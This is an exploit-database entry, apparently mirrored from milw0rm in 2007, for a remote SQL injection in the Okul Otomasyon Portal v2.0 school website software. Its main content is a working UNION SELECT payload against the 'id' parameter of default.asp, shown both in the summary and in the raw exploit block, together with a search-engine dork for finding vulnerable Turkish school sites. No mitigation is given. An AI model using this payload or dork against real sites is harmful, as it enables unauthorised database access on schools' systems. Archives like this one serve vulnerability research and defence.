header-logo
Suggest Exploit
vendor:
by:
Okulumun sitesi
N/A
CVSS
N/A
remote sql injection
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Dumenci v19.1

The Okul Otomasyon Portal v2.0 is vulnerable to remote SQL injection. The injection address is http://site.com/default.asp?islem=1&id=[sql code]. An example of the SQL code to exploit this vulnerability is -1+union+select+0,1,id,baslik,4,5,6+from+haber.

Mitigation:

Unknown
Source

Exploit-DB raw data:

################################  Dumenci v19.1   ###################################
####                       Okul Otomasyon Portal v2.0                            ####
####                          remote sql injection                               ####
#####################################################################################
#                                                                                   #
#AUTHOR : Okulumun sitesi                                                           #
#Script Download : http://www.okulumunsitesi.com/                                   #
#DORK: "inurl:/k12.tr/?part="                                                       #
#                                                                                   #
#                                                                                   #
#                                                                                   #
# Injection Adress : http://site.com/default.asp?islem=1&id=[sql code]              #
# my COD : -1+union+select+0,1,id,baslik,4,5,6+from+haber                           #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#                                MEFISTO,KınSıze,CyberGhost                      #tr#
#####################################################################################

# milw0rm.com [2007-10-16]